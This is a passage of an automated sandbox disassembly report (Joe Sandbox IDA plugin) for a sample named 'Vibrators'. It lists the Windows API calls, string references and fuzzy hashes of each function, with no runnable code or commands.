PostMessageW.USER32(?,00000101,00000012,?), ref: 00A5B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A5B9E7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4b3625da45603bc58e3926cbc72a41eb1751ad1019c8122126a6b8db3c317d88
Instruction ID: c52d623b85b213edcb645b0c7f501df93e01043902bf0da032c606fb5eddb50c
Opcode Fuzzy Hash: 4b3625da45603bc58e3926cbc72a41eb1751ad1019c8122126a6b8db3c317d88
Instruction Fuzzy Hash: F551D3A05247D57EFB3647348856BB67EA97B06307F088489EAD5458D2C3F8ACCCD760

Function 00A5B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00A5B6E0
GetKeyboardState.USER32(?), ref: 00A5B6F5
SetKeyboardState.USER32(?), ref: 00A5B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A5B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A5B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A5B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A5B7FF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d271f79743f6acac89495c6b1c54223772ec800dd00d8d26dc1402e3c02c2a7e
Instruction ID: 01331c99d52a9da4cb5f7e0b1b0a5ce9e953844d799714918209c5b8a313e320
Opcode Fuzzy Hash: d271f79743f6acac89495c6b1c54223772ec800dd00d8d26dc1402e3c02c2a7e
Instruction Fuzzy Hash: 9751E3A09247D53EFB3283648C55B76BEA87B45307F088489E8D5468D2D3B4EC8CD770

Function 00A257A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00A25F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00A257E3
__fassign.LIBCMT ref: 00A2585E
__fassign.LIBCMT ref: 00A25879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00A2589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00A25F16,00000000,?,?,?,?,?,?,?,?,?,00A25F16,?), ref: 00A258BE
WriteFile.KERNEL32(?,?,00000001,00A25F16,00000000,?,?,?,?,?,?,?,?,?,00A25F16,?), ref: 00A258F7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 5279791cbce579661d0b7529f9ccb34bba8eb4969f4e24fa7a496ec53c7946e2
Instruction ID: 079bdb596ee75a9d84db994f8d0c3a4722a59eda515e120b5ede0db387c4c2f6
Opcode Fuzzy Hash: 5279791cbce579661d0b7529f9ccb34bba8eb4969f4e24fa7a496ec53c7946e2
Instruction Fuzzy Hash: 80518E71E006599FCB10CFA8E885AEEBBF8FF09310F14416AE955E7291D7309981CBA1

Function 00A223C1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A22433
_free.LIBCMT ref: 00A22453

Strings

p6, xrefs: 00A223E6, 00A22428, 00A22448, 00A224C8

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free
String ID: p6
API String ID: 269201875-2659408500
Opcode ID: d575e2988efe6c1e2476b86a47335990ca257b39e06dd449eb9cda02e5da1d2d
Instruction ID: ddc84dfd5a8343fba3fd5106d8af8a172d24ebc8720f9f86682fb7f132ec226e
Opcode Fuzzy Hash: d575e2988efe6c1e2476b86a47335990ca257b39e06dd449eb9cda02e5da1d2d
Instruction Fuzzy Hash: F641B032A00220ABCB20EF7CD981A5AB7E6EF88314B154569E515EB391DA31AD42DB80

Function 00A13090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A130BB
___except_validate_context_record.LIBVCRUNTIME ref: 00A130C3
_ValidateLocalCookies.LIBCMT ref: 00A13151
__IsNonwritableInCurrentImage.LIBCMT ref: 00A1317C
_ValidateLocalCookies.LIBCMT ref: 00A131D1

Strings

csm, xrefs: 00A13166

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2cdd2df3311bed5dac21b9044cf7e4f198e116ca6abccea0ccfecf6c6d08674e
Instruction ID: de0d51f59e153a42fe18646980f11a4f77237bd0dc356460fb0036b01cff6815
Opcode Fuzzy Hash: 2cdd2df3311bed5dac21b9044cf7e4f198e116ca6abccea0ccfecf6c6d08674e
Instruction Fuzzy Hash: 3641D236E00209BBCF10DF68C881AEEBBB5BF45324F148255E815AB392D731DB85CB91

Function 00A71B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A73AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A73AD7
Part of subcall function 00A73AAB: _wcslen.LIBCMT ref: 00A73AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A71B6F
WSAGetLastError.WSOCK32 ref: 00A71B7E
WSAGetLastError.WSOCK32 ref: 00A71C26
closesocket.WSOCK32(00000000), ref: 00A71C56

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: b492348f117efaa5fa4100e12d1e023b8d0008cb04eed941ba5ab792bee9550e
Instruction ID: f8e12be3898e49a6bdf915dc4686551641233d5128f4bb99e7662d4cb3286834
Opcode Fuzzy Hash: b492348f117efaa5fa4100e12d1e023b8d0008cb04eed941ba5ab792bee9550e
Instruction Fuzzy Hash: E741A271600118AFDB10DF68CC85BAABBE9EF85324F14C059E9099B292D774ED41CBA1

Function 00A5D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A5D7CD,?), ref: 00A5E714

Part of subcall function 00A5E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A5D7CD,?), ref: 00A5E72D

lstrcmpiW.KERNEL32(?,?), ref: 00A5D7F0
MoveFileW.KERNEL32(?,?), ref: 00A5D82A
_wcslen.LIBCMT ref: 00A5D8B0
_wcslen.LIBCMT ref: 00A5D8C6
SHFileOperationW.SHELL32(?), ref: 00A5D90C

Strings

\*.*, xrefs: 00A5D89E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 8f6ea7dc21b7a88baf1df38634657589fef91afb107784efe87bb6a044abea48
Instruction ID: f4deb9707072f4e6b33eacec6a57e2b7fc957042674b26dfc982738b4c3b3340
Opcode Fuzzy Hash: 8f6ea7dc21b7a88baf1df38634657589fef91afb107784efe87bb6a044abea48
Instruction Fuzzy Hash: BD4148719052189EDF16EFA4DA85BDE77B8BF18381F1004EAA515EB141EB34A78CCB50

Function 00A83899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00A838B8
GetWindowLongW.USER32(?,000000F0), ref: 00A838EB
GetWindowLongW.USER32(?,000000F0), ref: 00A83920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00A83952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00A8397C
GetWindowLongW.USER32(?,000000F0), ref: 00A8398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A839A7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 9d95b8f981f71f8485f4cfa364a97fbd917c04f373cba4812201452d0548d567
Instruction ID: e03a95b249210a077990ede2d9858f0100c487beff72dbd7923a79ed67337df0
Opcode Fuzzy Hash: 9d95b8f981f71f8485f4cfa364a97fbd917c04f373cba4812201452d0548d567
Instruction Fuzzy Hash: A8312432704255AFDF21EF88DC95F6837A5FB8AB20F1512A4F5108B2B1CBB1AD46DB01

Function 00A5808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A580D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A580F6
SysAllocString.OLEAUT32(00000000), ref: 00A580F9
SysAllocString.OLEAUT32(?), ref: 00A58117
SysFreeString.OLEAUT32(?), ref: 00A58120
StringFromGUID2.OLE32(?,?,00000028), ref: 00A58145
SysAllocString.OLEAUT32(?), ref: 00A58153

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a3e57014b6adc5867bc81c1b8923afe574b09e8c90c3a5396676167c76c702ee
Instruction ID: c7af7e6c5ad8fc238a5bdaeadd27043ebb328307013f58cbe917dab2e83a948f
Opcode Fuzzy Hash: a3e57014b6adc5867bc81c1b8923afe574b09e8c90c3a5396676167c76c702ee
Instruction Fuzzy Hash: 77218372600619AF9F10DFA8DC88CBA77ACFF093617048525FD05EB290DA74DC4A8B60

Function 00A58164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A581A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A581CF
SysAllocString.OLEAUT32(00000000), ref: 00A581D2
SysAllocString.OLEAUT32 ref: 00A581F3
SysFreeString.OLEAUT32 ref: 00A581FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00A58216
SysAllocString.OLEAUT32(?), ref: 00A58224

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a55d4739556ad9d02267a1208819ab3bdfae5409a10dbc7adc61d44453115f8d
Instruction ID: b8ea087280821ee132d086531e164014d2f00bf64c34da836fcc8ff23a00ad8b
Opcode Fuzzy Hash: a55d4739556ad9d02267a1208819ab3bdfae5409a10dbc7adc61d44453115f8d
Instruction Fuzzy Hash: 66217471600504BF9B10DBE8DC89DAA7BECFB09361B048125FD15DB2A0DA74EC46CB64

Function 00A60E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00A60E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A60ED5

Strings

nul, xrefs: 00A60F0E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 894b4e16a17e16928de93deaf1d8e0ee4c58fc064055c5aabbc049cd36150360
Instruction ID: c37ea4560c0264645cb3ff4b3a999a504e3146ac34bcfafe3be29ce929ecef17
Opcode Fuzzy Hash: 894b4e16a17e16928de93deaf1d8e0ee4c58fc064055c5aabbc049cd36150360
Instruction Fuzzy Hash: 0A21697050030AAFDB208F68DC04E9B7BB8BF54720F204A59FCA5E72D1E7B1A881CB50

Function 00A60F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A60F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A60FA8

Strings

nul, xrefs: 00A60FE0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: d02b720bb776f9f2fd1da83d8312a55a6db2a547fa11130760a4f19983e5affd
Instruction ID: 720343716be35125ba89bffad88007d674adb983e2bc269ab3f7115e7d91f343
Opcode Fuzzy Hash: d02b720bb776f9f2fd1da83d8312a55a6db2a547fa11130760a4f19983e5affd
Instruction Fuzzy Hash: 7A215E71500345EBDF309FA89C05E9A7BB8BF55724F240B19F8A1E72D0E7B19981DB50

Function 00A84B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009F78B1
Part of subcall function 009F7873: GetStockObject.GDI32(00000011), ref: 009F78C5
Part of subcall function 009F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F78CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A84BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A84BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A84BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A84BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A84BE3

Strings

Msctls_Progress32, xrefs: 00A84B81

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 017c62c4084eb2cede98781775e16095b87bd5c36951ab9a4b65736298bfdb9b
Instruction ID: 3ff29771e492a5ea2ff7db406ea9a9215b60b0da774874eb0afa4e12c41fefce
Opcode Fuzzy Hash: 017c62c4084eb2cede98781775e16095b87bd5c36951ab9a4b65736298bfdb9b
Instruction Fuzzy Hash: 1D1163B155021EBEEF119FA5CC85FEB7F6DEF08798F014111BA18A6090CA75DC21DBA4

Function 00A2DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A2DB23: _free.LIBCMT ref: 00A2DB4C

_free.LIBCMT ref: 00A2DBAD

Part of subcall function 00A22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4), ref: 00A22D4E
Part of subcall function 00A22D38: GetLastError.KERNEL32(00AC1DC4,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4,00AC1DC4), ref: 00A22D60

_free.LIBCMT ref: 00A2DBB8
_free.LIBCMT ref: 00A2DBC3
_free.LIBCMT ref: 00A2DC17
_free.LIBCMT ref: 00A2DC22
_free.LIBCMT ref: 00A2DC2D
_free.LIBCMT ref: 00A2DC38

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 94bc0083d864c7d8c1e0b65ffce29150596ffa28ea12db29a90886c75b91053d
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 60110D72581B24BAD530BBB4EE0BFCB77DC9F14700F814C39B2D9AA153DA65B5048B50

Function 00A5E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A5E328
LoadStringW.USER32(00000000), ref: 00A5E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A5E345
LoadStringW.USER32(00000000), ref: 00A5E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A5E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00A5E36D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 60dcfdc309363e9b39290c7bf7415eee4182e538c7eb0cb0c2afb8a5b15fba31
Instruction ID: 5e585fa433c2ee225cd28841ac9b778378f9d93812343844b5f75f41654fc35f
Opcode Fuzzy Hash: 60dcfdc309363e9b39290c7bf7415eee4182e538c7eb0cb0c2afb8a5b15fba31
Instruction Fuzzy Hash: E40136F690020C7FE711EBE49D89EEB776CEB08301F0045A1B749E6091E6749E898B75

Function 00A61312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00A61322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00A61334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00A61342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A61350
CloseHandle.KERNEL32(00000000), ref: 00A6135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A6136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00A61376

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 242a998fd54be773aca51c9d689a152d670ffefffa161e16f841585f6d9c1ca5
Instruction ID: 0b4247b0232da216c02d30225bf94870ad4de71898932ed9759d682976e40b20
Opcode Fuzzy Hash: 242a998fd54be773aca51c9d689a152d670ffefffa161e16f841585f6d9c1ca5
Instruction Fuzzy Hash: 18F0EC32042612BBD782AF94EE4DBD6BB39FF04312F441121F202958E0D7749472DF90

Function 00A726BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A7281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A7283E
